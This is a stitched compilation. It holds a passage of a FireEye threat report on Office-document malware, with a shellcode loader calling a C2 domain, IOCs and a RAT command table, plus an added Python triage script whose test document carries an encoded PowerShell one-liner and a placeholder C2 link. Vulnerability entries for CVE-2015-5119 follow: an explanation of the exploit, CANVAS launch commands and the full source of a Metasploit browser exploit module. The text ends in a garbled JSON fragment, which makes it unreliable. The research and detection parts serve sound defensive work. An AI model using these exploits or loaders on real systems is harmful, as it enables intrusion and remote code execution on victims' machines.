Current detection: 2/54
First submission: October 14, 2015
Last submission: January 28, 2016
Time undetected: 3.5 months with two generic detections

When the Excel document is opened, a message is displayed in Russian. The user is even provided with a link to a legitimate article describing how to enable macros (see Figure 24).

Figure 24: Excel file with legitimate link

When the VBA macro runs, it executes a PowerShell script that Base64-decodes and decompresses a second-stage PowerShell script, which is then used as the in-memory shellcode loader (see Figure 25).

Figure 25: PowerShell script being built on the fly via VB script

PowerShell uses the Invoke-Expression (IEX) cmdlet to execute the decompressed string, similar to the eval() functionality of other programming languages.

The shellcode in this case is hardcoded in the second-stage PowerShell script and is loaded and executed from memory with the following call:

    $z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000

where $x points to the shellcode copied into memory, which eventually connects to the domain spl[.]noip[.]me.
Based on a DNSDB query, the domain **spl[.]noip[.]me** previously resolved to the Russian IP 81.23.177.72.

Most of the VBA macro + PowerShell scripts we identified were created with the macro_safe.py[13] and unicorn.py[14] scripts, which are often used for penetration testing.

**Potential AV bypassing reason**

1. The .xlsm extension may bypass extension-based parsers.

2. Using the VBA macro in the first stage to build the first PowerShell script via string concatenation provides an easy way to bypass signature-based detection.

3. The PowerShell scripts are Base64-encoded and compressed.

**10. cda305a6a6c6ace02597881b01a116e3** - CVE-2013-1331-doc.docx

Type: DOCX
Description: Office downloader
Attribution: None
Current detection: 0/55
First submission: January 12, 2015
Last submission: January 16, 2016
Time undetected in VT: The whole year and counting!

In 2013, a stack-based buffer overflow triggered while parsing PNG images was exploited in the wild against Microsoft Office 2003 and Office for Mac. CVE-2013-1331 was assigned to the vulnerability.

The malicious samples did not embed the PNG directly in the document; rather, the PNG file was loaded from the Internet using the INCLUDEPICTURE field[15].

This new sample uses a different mechanism of the Office Open XML format, a package "Relationship" with an external target, to download a resource from the Internet, as seen in Figure 26.

Figure 26: XML content loading the PNG image remotely

The same domain was used back in 2013, but now with a different download technique. Although the vulnerability has been patched by Microsoft, the technique can be used to download any resource from the Internet.

**Potential AV bypassing reason**

1. Use of an XML "Relationship" instead of the original INCLUDEPICTURE method to download resources from the Internet is a novel technique that may not be recognized.

2. Based on the code shown above, it is clear that the intention is not to download a .gif image but a .php resource. Signature-based engines should easily detect the unusual resource name with multiple dots.

##### **Conclusion**

Threat actors of all types continue to improve their techniques to compromise organizations and remain undetected within an environment. Our study identified a number of techniques that successfully bypassed many AV engines:

1. Alternate techniques to embed objects within Office documents that may not be recognized by AV engines.

2. The use of a multi-stage infection approach in order to look unsuspicious at each stage:

   a. A document downloading an image from the Internet that cannot be flagged as malicious at that stage
   b. A VBA macro script loading malicious content from spreadsheet cells

3. Multiple techniques to load malicious content from Office documents:

   a. Embedded as ActiveX
   b. Embedded as OLE binary
   c. Embedded in the document's comments
   d. Embedded in a spreadsheet cell

4. Standalone packed binaries containing malicious Python scripts.

5. Multi-layer packing: RLPack + custom UPX.

6. The combination of multiple scripting languages to allow the attackers to obfuscate malicious code, such as a VBA script building a malicious PowerShell script.

In several cases we note that the attackers are reusing known exploits (such as CVE-2015-5119 or CVE-2013-1331) but changing the delivery method, or leveraging obfuscation, encoding, encryption, or multiple layers of packing to disguise their malicious scripts or backdoors.

For proper detection, it is essential to monitor an attack through its entire life cycle, not simply when a suspicious document or file first enters a network. This approach is necessary to detect and block multi-stage infection strategies.
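Every technique catalogued in samples 7 through 10 and in the conclusion is visible in the document container before anything executes: an OOXML package carrying a legacy .xls extension, a vbaProject.bin part, OLE objects under embeddings/, script text in word/comments.xml, hidden sheets, and a package Relationship with TargetMode="External" pointing at a remote resource. The Python script below is an added example, not from the original report or from any of the samples it analyses; it opens a package and lists these traits. Both documents it inspects are constructed inside the script, and the c2.example.invalid host in the external relationship is a placeholder.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
SML_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
WML_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
# Tokens that do not belong in a reviewer's comment on a document.
SCRIPTY = re.compile(r"powershell|invoke-expression|\biex\b|cmd(?:\.exe)?\s+/c|wscript|cscript|certutil|bitsadmin", re.I)


def triage_ooxml(data, claimed_ext):
    """Return human-readable findings for an Office document given as bytes."""
    findings = []
    if not data.startswith(b"PK\x03\x04"):
        return ["not an OOXML ZIP container (legacy OLE2 binary or other format)"]
    if claimed_ext.lower() in (".xls", ".doc", ".ppt"):
        findings.append(f"extension {claimed_ext} claims legacy binary format but content is OOXML")
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in pkg.namelist():
            low = name.lower()
            if low.endswith("vbaproject.bin"):
                findings.append(f"VBA macro project: {name}")
            if "/embeddings/" in low:
                findings.append(f"embedded object: {name}")
            if "/activex/" in low:
                findings.append(f"ActiveX control part: {name}")
            if low.endswith(".rels"):  # external targets are fetched when the document is rendered
                for rel in ET.fromstring(pkg.read(name)).iter(f"{{{REL_NS}}}Relationship"):
                    if rel.get("TargetMode") == "External":
                        kind = (rel.get("Type") or "").rsplit("/", 1)[-1]
                        findings.append(f"external relationship ({kind}) in {name}: {rel.get('Target')}")
            if low == "xl/workbook.xml":  # hidden sheets are where sample 7 parked its OLE object
                for sheet in ET.fromstring(pkg.read(name)).iter(f"{{{SML_NS}}}sheet"):
                    if sheet.get("state") in ("hidden", "veryHidden"):
                        findings.append(f"{sheet.get('state')} sheet: {sheet.get('name')}")
            if low.startswith("word/comments") and low.endswith(".xml"):
                text = " ".join(t.text or "" for t in ET.fromstring(pkg.read(name)).iter(f"{{{WML_NS}}}t"))
                if SCRIPTY.search(text):
                    findings.append(f"script-like text in document comments ({name})")
    return findings


def _package(parts):
    """Build an in-memory ZIP from {part name: str or bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, content in parts.items():
            z.writestr(name, content)
    return buf.getvalue()


# Constructed .docx: a comment carrying a PowerShell one-liner (sample 8's
# technique) and an image relationship pointing at a remote .php resource
# (sample 10's technique). The host is a placeholder.
DOCX_SAMPLE = _package({
    "[Content_Types].xml": "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>",
    "word/document.xml": f"<w:document xmlns:w='{WML_NS}'><w:body/></w:document>",
    "word/comments.xml": f"<w:comments xmlns:w='{WML_NS}'><w:comment><w:p><w:r>"
                         "<w:t>powershell -nop -w hidden -e SQBFAFgA</w:t></w:r></w:p></w:comment></w:comments>",
    "word/_rels/document.xml.rels": f"<Relationships xmlns='{REL_NS}'>"
        "<Relationship Id='rId5' TargetMode='External' "
        "Type='http://schemas.openxmlformats.org/officeDocument/2006/relationships/image' "
        "Target='http://c2.example.invalid/img/a.gif.php'/></Relationships>",
})

# Constructed workbook saved with an .xls extension: VBA project, hidden Sheet3
# and an embedded OLE object (sample 7's traits). The OLE2 parts are just the
# compound-file magic plus padding.
XLS_SAMPLE = _package({
    "[Content_Types].xml": "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>",
    "xl/workbook.xml": f"<workbook xmlns='{SML_NS}'><sheets>"
        "<sheet name='Sheet1' sheetId='1'/><sheet name='Sheet3' sheetId='3' state='hidden'/>"
        "</sheets></workbook>",
    "xl/vbaProject.bin": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 504,
    "xl/embeddings/oleObject1.bin": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 504,
})

if __name__ == "__main__":
    for label, doc, ext in (("Doc1.docx", DOCX_SAMPLE, ".docx"), ("Book2.xls", XLS_SAMPLE, ".xls")):
        print(label)
        for finding in triage_ooxml(doc, ext):
            print("  -", finding)
```

None of these traits is malicious on its own (macros, embedded objects and external links all have legitimate uses), which is exactly why the report's samples evaded signatures; the value of the check is that a document combining several of them, or carrying a legacy extension over OOXML content, earns sandbox detonation before it reaches a user.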
While initial events (such as the delivery of a macro-enabled spreadsheet) may appear innocuous, a later stage of the attack will eventually trigger detection.

It is much easier to stop an attack, including a multi-stage attack, when it first occurs; that includes detecting known and unknown exploits (zero-days), and even threats that require user interaction, such as macros inside documents.

This detection approach is the core logic behind FireEye Multi-Vector Virtual Execution (MVX) technology.

##### **APPENDIX**

**Indicators of Compromise - IOCs**

**Network Based:**

**4b3858c8b35e964a5eb0e291ff69ced6**
POST /0000/a242550.asp
IP: 220.128.223.75
TCP Port: 8080

**4e51143b01e99afc3bd908794d81d3cb**
GET /bbs/file/machinery/machine_body.jpg
Host: cncauto.co.kr
TCP Port: 80

**8de1ebacb72f3b23a8235cc66a6b6f68**
Host: spl.noip.me
TCP Port: 80

**b1f43ca11dcf9e60f230b9d6d332c479**
IP: 31.168.144.18
TCP Port: 443

**aedd5d8446cc12ddfdc426cca3ed8bf0**
IP: 84.11.146.62
TCP Port: 13661

**497eddab53c07f4be1dc4a8c169261a5**
GET /ocagnt/gethooks.asp
GET /ocagnt/enckeys
GET /ocagnt/getstatus.asp
IP: 94.70.155.253
TCP Port: 80

**dc15336e7e4579c9c04c6e4e1f11d3dd**
Host: dennyhacker.no-ip.org
TCP Port: 81

**Host-Based:**

**dc15336e7e4579c9c04c6e4e1f11d3dd**
C:\Windows\System32\install\server.exe (copy of dropped binary, md5 d409dc7e1ca0c86cb71e090591f16146)
%AppData%\Local\Temp\XX--XX--XX.txt

Mutexes created:
_x_X_PASSWORDLIST_X_x_
x_X_BLOCKMOUSE_X_x_
***MUTEX***
***MUTEX***_PERSIST

**497eddab53c07f4be1dc4a8c169261a5**
c:\octemp001\
C:\octemp001\enccmdresults.txt
C:\octemp001\ikeycharvalue.txt
C:\octemp001\enchostnameres.txt
C:\octemp001\certutil.txt
C:\octemp001\cert.txt
C:\octemp001\commands.txt
C:\octemp001\prevcommands.txt
C:\octemp001\enccmdresults2.txt
c:\octemp001\key.txt

Figure 27 shows the MD5s with zero detections detailed in this report.

Figure 27: 2015 samples from VT with zero detections in 2016

Some exceptions to this study were added for samples with low detection rates but only generic detection (that is, not detected as part of any specific code family), that used an interesting technique, or that were suspected of being used by an APT group (see Figure 28).

Figure 28: Samples with low and / or generic detection

**dc15336e7e4579c9c04c6e4e1f11d3dd** – Brazilian RAT

Some interesting commands from the RAT, many of them in Portuguese (translations given where the command is Portuguese):

| Offset | Command | Meaning |
|---|---|---|
| 0002A3A8 | pingtest | |
| 0002A3BC | tentarnovamente | try again |
| 0002A3E0 | mouseposition | |
| 0002A3F8 | keyboardkey | |
| 0002A40C | webcaminactive | |
| 0002A424 | webcamgetbuffer | |
| 0002A43C | webcam | |
| 0002A44C | desktop | |
| 0002A45C | stopsearch | |
| 0002A470 | listarvalores | list values |
| 0002A488 | maininfo | |
| 0002A49C | configuracoesdoserver | server settings |
| 0002A4BC | disconnect | |
| 0002A4D0 | uninstall | |
| 0002A4E4 | renameservidor | rename server |
| 0002A4FC | enviarexecnormal | send and execute (visible) |
| 0002A518 | enviarexechidden | send and execute (hidden) |
| 0002A534 | executarcomandos | execute commands |
| 0002A550 | openweb | |
| 0002A560 | downexec | |
| 0002A574 | resumetransfer | |
| 0002A58C | listardrives | list drives |
| 0002A5A4 | listararquivos | list files |
| 0002A5BC | execnormal | |
| 0002A5D0 | execinv | |
| 0002A5E0 | deletardir | delete directory |

[1] Hangul Word Processor is a word processing application developed by South Korean software firm Hancom.
[2] http://www.securityweek.com/zero-day-exploits-leaked-hacking-team-breach
[3] https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html
[4] https://msdn.microsoft.com/en-us/library/dd942138.aspx
[5] An XLSB file is stored in binary format instead of the normal XML format, allowing the file to be read from and written to much faster.
See https://technet.microsoft.com/en-us/library/dd797428.aspx
[6] http://asec.ahnlab.com/1035
[7] https://www.fireeye.com/content/dam/fireeye-www/global/en/blog/threat-research/FireEye_HWP_ZeroDay.pdf
[8] http://www.pcworld.com/product/997528/rlpack-basic-edition.html
[9] https://www.fireeye.com/blog/threat-research/2014/07/the-little-signature-that-could-the-curious-case-of-cz-solution.html
[10] Py2Exe is a distutils extension to create standalone Windows programs from Python scripts. See https://sourceforge.net/projects/py2exe/.
[11] https://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/shikata_ga_nai.rb
[12] http://www.howtogeek.com/163127/how-powershell-differs-from-the-windows-command-prompt/
[13] https://github.com/khr0x40sh/MacroShop/blob/master/macro_safe.py
[14] https://raw.githubusercontent.com/trustedsec/unicorn/master/unicorn.py
[15] http://blogs.technet.com/b/srd/archive/2013/06/11/ms13-051-get-out-of-my-office.aspx

Source: FireEye Threat Research, "Ghosts in the Endpoint", published 2016-04-13, https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.html. CVEs referenced: CVE-2013-1331, CVE-2015-5119.

**AttackerKB: CVE-2015-5119**

Use-after-free vulnerability in the ByteArray class in the ActionScript 3 (AS3) implementation in Adobe Flash Player 13.x through 13.0.0.296 and 14.x through 18.0.0.194 on Windows and OS X and 11.x through 11.2.202.468 on Linux allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content that overrides a valueOf function, as exploited in the wild in July 2015.

Recent assessments:

**gwillcox-r7** at November 23, 2020 6:06pm UTC reported:

Reported as exploited in the wild as part of Google's 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>

Assessed Attacker Value: 0

Source: https://attackerkb.com/topics/eDqrGGkKhD/cve-2015-5119 (published 2021-07-27)

**AttackerKB: Adobe Flash ByteArray Use-After-Free**

Same CVE description as above.

Recent assessments:

**wchen-r7** at September 12, 2019 6:07pm UTC reported:

<http://en.wikipedia.org/wiki/Adobe_Flash_Player>

Congrats! You are reading about the most beautiful Flash bug for the last four years since CVE-2010-2161.

The use-after-free vulnerability exists inside the built-in ByteArray class
<http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/utils/ByteArray.html>

Let's create a simple ByteArray object:

    var ba:ByteArray = new ByteArray();
    ba.length = 8;
    ba[1] = 1;

Now we can access ba[] items and write numeric byte values into ba[]. Also we are allowed to write objects into ByteArray. For example:

    var obj = new MyClass();
    ba[0] = obj;

AS3 will try to implicitly convert the MyClass object into a numeric value by calling the MyClass.valueOf() method. This method can be easily redefined within the user's code:

    class MyClass
    {
        prototype.valueOf = function()
        {
            ba.length = 88; // reallocate ba[] storage
            return 0;       // return byte for ba[offset]
        }
    }

Let's see how that implicit conversion occurs inside the native code:

    push esi
    mov  eax, [esp+8]           // the offset value from "ba[offset] = obj"
    push eax
    add  ecx, 0x18              // ecx = this = "ba" object pointer
    call ByteArray.getStorage() // gets ba[offset] storage pointer and
    mov  esi, eax               // saves it in esi

    mov  ecx, [esp+0xC]         // "obj" pointer
    push ecx
    call AvmCore.toInteger()    // call MyClass.valueOf()
    add  esp, 4
    mov  [esi], al              // writes returned byte into array

    pop  esi
    ret  8

In a high-level language this will look like:

    void ByteArray.setObjInternal(int offset, obj)
    {
        byte* dest = this.getStorage(offset);
        *dest = toInteger(obj);
    }

So the array storage pointer is saved in a local variable, then AS3 valueOf() is invoked from the native code and the returned byte is written into the destination pointer at the end. If valueOf() changes the length of the byte array (see above) and reallocates its internal storage, then the local destination pointer becomes obsolete and further usage of that pointer can lead to UaF memory corruption.

Using this vulnerability, it's very easy to control what byte will be written and at which offset this corruption will occur.

1. AFFECTED SOFTWARE
Adobe Flash Player 9 and higher

2. TESTING
Open the test "calc.htm" file in your browser and press the button.

on Windows:
Calc.exe should be popped on desktop IE.
Calc.exe should be run as a non-GUI child process in metro IE.
Payload returns 0 from CreateProcessA("calc.exe") inside Chrome/FF sandbox.

on OS X:
Calculator is launched in FF or standalone Flash Player projector.
Payload returns 1 from vfork() in Safari sandbox.

Assessed Attacker Value: 0

Source: https://attackerkb.com/topics/jLhkepp0Dv/adobe-flash-bytearray-use-after-free (published 2015-07-08, modified 2020-02-13). Related CVEs: CVE-2010-2161, CVE-2015-5119.

**Packet Storm: Adobe Flash Player ByteArray Use After Free (PACKETSTORM:132600)**

Published 2015-07-08. https://packetstormsecurity.com/files/132600/Adobe-Flash-Player-ByteArray-Use-After-Free.html

The file hosted there (adobe_flash_hacking_team_uaf.rb) is the 2015 revision of the Metasploit module reproduced in full under the Metasploit entry below. That revision used the Metasploit3 class and `require 'msf/core'`, compared Flash versions with Gem::Version rather than Rex::Version, passed an extra os= FlashVars parameter to the SWF, carried a 'Jul 06 2015' disclosure date with no Notes/AKA block, and listed Windows 8.1 (32-bit), IE11 and Flash 17.0.0.169 among its tested configurations.

**Immunity CANVAS: ADOBE_FLASH_VALUEOF**

Name: adobe_flash_valueof
CVE: CVE-2015-5119 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5119)
Exploit pack: CANVAS (http://www.immunityinc.com/products-canvas.shtml)
Vendor: Adobe
Tested on: Windows 7 x86/x64, IE (32/64) 8, 9, 11
Versions affected: Adobe Flash Player 9 and later, up to and including 18.0.0.194, on Windows
Repeatability: One-shot
Reference: http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/

This module exploits a use-after-free vulnerability in Adobe Flash Player. When you have a ByteArray object ba and perform an assignment like ba[0] = object, Flash calls that object's valueOf function. valueOf can be overridden, so the object's valueOf can change ba itself. If the ba storage is reallocated inside valueOf, the assignment completes through the storage pointer it saved before the call, a use after free.

IMPORTANT: You need to set up a WIN64 MOSDEF INTEL listener in order for the callback process to work, as the InjectToSelf shellcode doesn't support Universal MOSDEF yet.

Usage:

    python ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:adobe_flash_valueof -O auto_detect_exploits:0
    python commandlineInterface.py -v 17 -p5555

Source: http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/adobe_flash_valueof (published 2015-07-08)

**NVD: CVE-2015-5119**

Description as quoted under AttackerKB above. CWE-119. CVSS v2 base score 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C), severity HIGH. Published 2015-07-08, last modified 2017-01-20. https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5119

Affected Flash Player builds listed in the NVD CPE configuration: 11.2.202.468; 13.0.0.292; 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179; 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246; 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296; 17.0.0.134, 17.0.0.169, 17.0.0.188; 18.0.0.161, 18.0.0.194.

**Metasploit: exploit/multi/browser/adobe_flash_hacking_team_uaf**

Adobe Flash Player ByteArray Use After Free. Rank: Great. Published 2015-07-07, last modified 2021-02-25. https://www.rapid7.com/db/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf/

This module exploits a use after free in Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public as part of the July 2015 data leak, was described as a use after free while handling ByteArray objects. This module has been tested successfully on:

 * Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194
 * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194
 * Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194
 * Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194
 * Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468

Module source (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb):

    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    class MetasploitModule < Msf::Exploit::Remote
      Rank = GreatRanking

      include Msf::Exploit::Remote::BrowserExploitServer

      def initialize(info={})
        super(update_info(info,
          'Name'           => 'Adobe Flash Player ByteArray Use After Free',
          'Description'    => %q{
            This module exploits an use after free on Adobe Flash Player. The vulnerability,
            discovered by Hacking Team and made public as part of the July 2015 data leak, was
            described as an Use After Free while handling ByteArray objects. This module has
            been tested successfully on:

            Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
            Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
            Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
            Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and
            Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.
          },
          'License'        => MSF_LICENSE,
          'Author'         =>
            [
              'Unknown',      # Someone from HackingTeam
              'juan vazquez', # msf module
              'sinn3r'        # msf module
            ],
          'References'     =>
            [
              ['CVE', '2015-5119'],
              ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-03.html'],
              ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'],
              ['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816']
            ],
          'Payload'        =>
            {
              'DisableNops' => true
            },
          'Platform'       => ['win', 'linux'],
          'Arch'           => [ARCH_X86],
          'BrowserRequirements' =>
            {
              :source  => /script|headers/i,
              :arch    => ARCH_X86,
              :os_name => lambda do |os|
                os =~ OperatingSystems::Match::LINUX ||
                os =~ OperatingSystems::Match::WINDOWS_7 ||
                os =~ OperatingSystems::Match::WINDOWS_81 ||
                os =~ OperatingSystems::Match::WINDOWS_VISTA ||
                os =~ OperatingSystems::Match::WINDOWS_XP
              end,
              :ua_name => lambda do |ua|
                case target.name
                when 'Windows'
                  return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
                when 'Linux'
                  return true if ua == Msf::HttpClients::FF
                end

                false
              end,
              :flash => lambda do |ver|
                case target.name
                when 'Windows'
                  return true if Rex::Version.new(ver) <= Rex::Version.new('18.0.0.194')
                when 'Linux'
                  return true if ver =~ /^11\./ && Rex::Version.new(ver) <= Rex::Version.new('11.2.202.468')
                end

                false
              end
            },
          'Targets'        =>
            [
              [ 'Windows',
                {
                  'Platform' => 'win'
                }
              ],
              [ 'Linux',
                {
                  'Platform' => 'linux'
                }
              ]
            ],
          'Privileged'     => false,
          'DisclosureDate' => '2015-07-06',
          'DefaultTarget'  => 0,
          'Notes'          =>
            {
              'AKA' => ['0DayFlush']
            }
        ))
      end

      def exploit
        @swf = create_swf

        super
      end

      def on_request_exploit(cli, request, target_info)
        print_status("Request: #{request.uri}")

        if request.uri =~ /\.swf$/
          print_status('Sending SWF...')
          send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
          return
        end

        print_status('Sending HTML...')
        send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
      end

      def exploit_template(cli, target_info)
        swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
        target_payload = get_payload(cli, target_info)
        b64_payload = Rex::Text.encode_base64(target_payload)

        if target.name =~ /Windows/
          platform_id = 'win'
        elsif target.name =~ /Linux/
          platform_id = 'linux'
        end

        html_template = %Q|<html>
        <body>
        <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
        <param name="movie" value="<%=swf_random%>" />
        <param name="allowScriptAccess" value="always" />
        <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>" />
        <param name="Play" value="true" />
        <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>" Play="true"/>
        </object>
        </body>
        </html>
        |

        return html_template, binding()
      end

      def create_swf
        path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-5119', 'msf.swf')
        swf = ::File.open(path, 'rb') { |f| swf = f.read }

        swf
      end
    end
"NONE"}}], "symantec": [{"lastseen": "2021-06-08T18:45:41", "description": "### Description\n\nAdobe Flash Player is prone to a remote memory-corruption vulnerability because of a use-after-free error. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition.\n\n### Technologies Affected\n\n * Adobe AIR 1.0 \n * Adobe AIR 1.0.1 \n * Adobe AIR 1.0.4990 \n * Adobe AIR 1.0.8.4990 \n * Adobe AIR 1.01 \n * Adobe AIR 1.1 \n * Adobe AIR 1.1.0.5790 \n * Adobe AIR 1.5 \n * Adobe AIR 1.5.0.7220 \n * Adobe AIR 1.5.1 \n * Adobe AIR 1.5.1.8210 \n * Adobe AIR 1.5.2 \n * Adobe AIR 1.5.3 \n * Adobe AIR 1.5.3.9120 \n * Adobe AIR 1.5.3.9130 \n * Adobe AIR 13.0.0.111 \n * Adobe AIR 13.0.0.83 \n * Adobe AIR 14.0.0.110 \n * Adobe AIR 14.0.0.137 \n * Adobe AIR 14.0.0.178 \n * Adobe AIR 14.0.0.179 \n * Adobe AIR 15.0.0.249 \n * Adobe AIR 15.0.0.252 \n * Adobe AIR 15.0.0.293 \n * Adobe AIR 15.0.0.356 \n * Adobe AIR 16.0.0.245 \n * Adobe AIR 16.0.0.272 \n * Adobe AIR 17.0.0.144 \n * Adobe AIR 17.0.0.172 \n * Adobe AIR 18.0.0.143 \n * Adobe AIR 18.0.0.144 \n * Adobe AIR 2.0.2 \n * Adobe AIR 2.0.2.12610 \n * Adobe AIR 2.0.3 \n * Adobe AIR 2.0.3.13070 \n * Adobe AIR 2.0.4 \n * Adobe AIR 2.5.0.16600 \n * Adobe AIR 2.5.1 \n * Adobe AIR 2.5.1.17730 \n * Adobe AIR 2.6 \n * Adobe AIR 2.6.0.19120 \n * Adobe AIR 2.6.0.19140 \n * Adobe AIR 2.6.19120 \n * Adobe AIR 2.6.19140 \n * Adobe AIR 2.7 \n * Adobe AIR 2.7.0.1948 \n * Adobe AIR 2.7.0.19480 \n * Adobe AIR 2.7.0.1953 \n * Adobe AIR 2.7.0.19530 \n * Adobe AIR 2.7.1 \n * Adobe AIR 2.7.1.1961 \n * Adobe AIR 2.7.1.19610 \n * Adobe AIR 3.0 \n * Adobe AIR 3.0.0.408 \n * Adobe AIR 3.0.0.4080 \n * Adobe AIR 3.1.0.485 \n * Adobe AIR 3.1.0.488 \n * Adobe AIR 3.1.0.4880 \n * Adobe AIR 3.2.0.207 \n * Adobe AIR 3.2.0.2070 \n * Adobe AIR 3.2.0.2080 \n * Adobe AIR 3.3.0.3610 \n * Adobe AIR 3.3.0.3670 \n * Adobe AIR 3.3.0.3690 \n 
* Adobe AIR 3.4.0.2540 \n * Adobe AIR 3.4.0.2710 \n * Adobe AIR 3.5.0.1060 \n * Adobe AIR 3.5.0.600 \n * Adobe AIR 3.5.0.880 \n * Adobe AIR 3.5.0.890 \n * Adobe AIR 3.6.0.597 \n * Adobe AIR 3.6.0.599 \n * Adobe AIR 3.6.0.6090 \n * Adobe AIR 3.7.0.1530 \n * Adobe AIR 3.7.0.1660 \n * Adobe AIR 3.7.0.1860 \n * Adobe AIR 3.7.0.2090 \n * Adobe AIR 3.7.0.2100 \n * Adobe AIR 3.8.0.1430 \n * Adobe AIR 3.8.0.870 \n * Adobe AIR 3.8.0.910 \n * Adobe AIR 3.9.0.1060 \n * Adobe AIR 3.9.0.1210 \n * Adobe AIR 3.9.0.1380 \n * Adobe AIR 4 \n * Adobe AIR 4.0.0.1390 \n * Adobe AIR 4.0.0.1390 SDK \n * Adobe AIR 4.0.0.1628 \n * Adobe AIR SDK 13.0.0.111 \n * Adobe AIR SDK 13.0.0.83 \n * Adobe AIR SDK 14.0.0.110 \n * Adobe AIR SDK 14.0.0.137 \n * Adobe AIR SDK 14.0.0.178 \n * Adobe AIR SDK 14.0.0.179 \n * Adobe AIR SDK 15.0.0.249 \n * Adobe AIR SDK 15.0.0.302 \n * Adobe AIR SDK 15.0.0.356 \n * Adobe AIR SDK 16.0.0.272 \n * Adobe AIR SDK 17.0.0.144 \n * Adobe AIR SDK 17.0.0.172 \n * Adobe AIR SDK 18.0.0.143 \n * Adobe AIR SDK 18.0.0.144 \n * Adobe AIR SDK 3.9.0.1380 \n * Adobe AIR SDK 4.0.0.1390 \n * Adobe Flash Player 10 \n * Adobe Flash Player 10.0.0.584 \n * Adobe Flash Player 10.0.12.35 \n * Adobe Flash Player 10.0.12.36 \n * Adobe Flash Player 10.0.12.10 \n * Adobe Flash Player 10.0.15.3 \n * Adobe Flash Player 10.0.2.54 \n * Adobe Flash Player 10.0.22.87 \n * Adobe Flash Player 10.0.32.18 \n * Adobe Flash Player 10.0.42.34 \n * Adobe Flash Player 10.0.45.2 \n * Adobe Flash Player 10.1 \n * Adobe Flash Player 10.1.102.64 \n * Adobe Flash Player 10.1.102.65 \n * Adobe Flash Player 10.1.105.6 \n * Adobe Flash Player 10.1.106.16 \n * Adobe Flash Player 10.1.106.17 \n * Adobe Flash Player 10.1.51.66 \n * Adobe Flash Player 10.1.52.14 \n * Adobe Flash Player 10.1.52.14.1 \n * Adobe Flash Player 10.1.52.15 \n * Adobe Flash Player 10.1.53.64 \n * Adobe Flash Player 10.1.82.76 \n * Adobe Flash Player 
